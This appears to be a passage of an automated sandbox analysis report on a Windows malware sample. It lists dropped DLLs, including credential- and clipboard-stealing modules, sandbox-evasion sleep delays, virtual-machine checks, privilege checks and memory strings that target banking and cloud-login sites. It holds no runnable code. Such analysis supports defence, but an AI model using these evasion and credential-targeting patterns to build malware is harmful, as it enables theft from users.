                          Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 4009
                          Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 4005
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1975
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1796
                          Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_5-39237
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\clip64[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15962\_hashlib.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15962\python38.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15962\unicodedata.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\cred64[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15962\_socket.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15962\_ctypes.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15962\_lzma.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15962\libcrypto-1_1.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-console-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15962\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15962\select.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15962\_bz2.pydJump to dropped file
                          Source: C:\Windows\System32\svchost.exeEvaded block: after key decisiongraph_2-847
                          Source: C:\Windows\System32\audiodg.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_8-1135
                          Source: C:\Windows\System32\msiexec.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_9-1149
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-1139
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_6-1188
                          Source: C:\Windows\System32\svchost.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_2-1134
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_11-17044
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeAPI coverage: 1.9 %
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeAPI coverage: 4.2 %
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeAPI coverage: 1.9 %
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeAPI coverage: 1.9 %
                          Source: C:\Windows\System32\audiodg.exe TID: 5348Thread sleep time: -50000s >= -30000sJump to behavior
                          Source: C:\Windows\System32\audiodg.exe TID: 5348Thread sleep count: 1215 > 30Jump to behavior
                          Source: C:\Windows\System32\audiodg.exe TID: 5348Thread sleep time: -60750000s >= -30000sJump to behavior
                          Source: C:\Windows\System32\audiodg.exe TID: 5316Thread sleep count: 87 > 30Jump to behavior
                          Source: C:\Windows\System32\audiodg.exe TID: 5316Thread sleep time: -234900s >= -30000sJump to behavior
                          Source: C:\Windows\System32\msiexec.exe TID: 5856Thread sleep time: -50000s >= -30000sJump to behavior
                          Source: C:\Windows\System32\msiexec.exe TID: 5856Thread sleep count: 1343 > 30Jump to behavior
                          Source: C:\Windows\System32\msiexec.exe TID: 5856Thread sleep time: -67150000s >= -30000sJump to behavior
                          Source: C:\Windows\System32\msiexec.exe TID: 1360Thread sleep count: 80 > 30Jump to behavior
                          Source: C:\Windows\System32\msiexec.exe TID: 1360Thread sleep time: -216000s >= -30000sJump to behavior
                          Source: C:\Windows\explorer.exe TID: 7132Thread sleep time: -1442100s >= -30000sJump to behavior
                          Source: C:\Windows\explorer.exe TID: 6896Thread sleep time: -180000s >= -30000sJump to behavior
                          Source: C:\Windows\explorer.exe TID: 7132Thread sleep time: -7934400s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exe TID: 740Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exe TID: 3436Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe TID: 3080Thread sleep count: 3490 > 30
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe TID: 3080Thread sleep time: -104700000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe TID: 4268Thread sleep time: -360000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe TID: 2184Thread sleep time: -540000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe TID: 3080Thread sleep time: -30000s >= -30000s
                          Source: C:\Windows\SysWOW64\rundll32.exe TID: 2928Thread sleep count: 4009 > 30
                          Source: C:\Windows\SysWOW64\rundll32.exe TID: 2928Thread sleep time: -4009000s >= -30000s
                          Source: C:\Windows\SysWOW64\rundll32.exe TID: 5688Thread sleep count: 4005 > 30
                          Source: C:\Windows\SysWOW64\rundll32.exe TID: 5688Thread sleep time: -4005000s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2856Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6092Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6656Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6424Thread sleep count: 1796 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4040Thread sleep time: -12912720851596678s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2400Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Windows\System32\audiodg.exeLast function: Thread delayed
                          Source: C:\Windows\System32\audiodg.exeLast function: Thread delayed
                          Source: C:\Windows\System32\msiexec.exeLast function: Thread delayed
                          Source: C:\Windows\System32\msiexec.exeLast function: Thread delayed
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeLast function: Thread delayed
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Windows\System32\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 11_2_00007FF7102C79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,11_2_00007FF7102C79B0
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 11_2_00007FF7102C85A0 FindFirstFileExW,FindClose,11_2_00007FF7102C85A0
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 11_2_00007FF7102E0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,11_2_00007FF7102E0B84
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FF7102C85A0 FindFirstFileExW,FindClose,16_2_00007FF7102C85A0
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FF7102C79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,16_2_00007FF7102C79B0
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FF7102E0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,16_2_00007FF7102E0B84
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FFEEE23303C FindFirstFileExW,FindNextFileW,FindClose,16_2_00007FFEEE23303C
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 16_2_00007FFEEE233280 FindFirstFileExW,FindNextFileW,FindClose,16_2_00007FFEEE233280
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeCode function: 18_2_004EF661 FindFirstFileExW,18_2_004EF661
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 19_2_0033F661 FindFirstFileExW,19_2_0033F661
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 20_2_0033F661 FindFirstFileExW,20_2_0033F661
                          Source: C:\Windows\explorer.exeCode function: 5_2_0C5B7B10 GetSystemInfo,VirtualAlloc,VirtualAlloc,5_2_0C5B7B10
                          Source: C:\Windows\System32\audiodg.exeThread delayed: delay time: 50000Jump to behavior
                          Source: C:\Windows\System32\audiodg.exeThread delayed: delay time: 50000Jump to behavior
                          Source: C:\Windows\System32\msiexec.exeThread delayed: delay time: 50000Jump to behavior
                          Source: C:\Windows\System32\msiexec.exeThread delayed: delay time: 50000Jump to behavior
                          Source: C:\Windows\explorer.exeThread delayed: delay time: 90000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeThread delayed: delay time: 30000
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeThread delayed: delay time: 180000
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeThread delayed: delay time: 180000
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeThread delayed: delay time: 30000
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\OneDrive\desktop.ini
                          Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\Music\desktop.ini
                          Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData
                          Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local
                          Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user
                          Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\Videos\desktop.ini
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696503903~
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.0000000003F56000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696503903
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696503903
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696503903o
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696503903z
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696503903}
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696503903h
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.0000000003F56000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696503903x
                          Source: explorer.exe, 00000005.00000003.3084849985.00000000087C2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3821436820.00000000087C2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1331938648.00000000087C2000.00000004.00000001.00020000.00000000.sdmp, Gxtuum.exe, 00000017.00000002.3805886910.0000000000835000.00000004.00000020.00020000.00000000.sdmp, Gxtuum.exe, 00000017.00000002.3805886910.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001A.00000002.3469272832.00000222064F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001C.00000002.3004550203.00000247D33D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001C.00000002.3004550203.00000247D3422000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001C.00000003.2990680017.00000247D3422000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000021.00000002.3797376340.0000000002E73000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000022.00000002.3798980117.00000000031BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696503903]
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.0000000003F56000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696503903u
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696503903|UE
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.0000000003F56000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696503903}
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696503903
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696503903t
                          Source: rundll32.exe, 0000001A.00000002.3469272832.00000222064C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
                          Source: explorer.exe, 00000005.00000003.2193186163.00000000088E1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
                          Source: netsh.exe, 0000001D.00000003.2264660397.0000021A2DB95000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 0000001E.00000003.2264160680.000001BF46665000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllYY
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.0000000003F56000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696503903n
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696503903
                          Source: explorer.exe, 00000005.00000003.2193186163.00000000088E1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}Z
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.0000000003F56000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696503903
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.0000000003F56000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696503903z
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696503903p
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696503903n
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696503903s
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.0000000003F56000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696503903p
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.0000000003F56000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696503903~
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.0000000003F56000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696503903
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.0000000003F56000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696503903
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696503903d
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.0000000003F56000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696503903o
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696503903j
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696503903f
                          Source: explorer.exe, 00000005.00000002.3821436820.0000000008761000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00j
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.000000000406C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696503903
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.0000000003F56000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696503903t
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.0000000003F56000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696503903t
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1769771051.0000000003F56000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696503903s
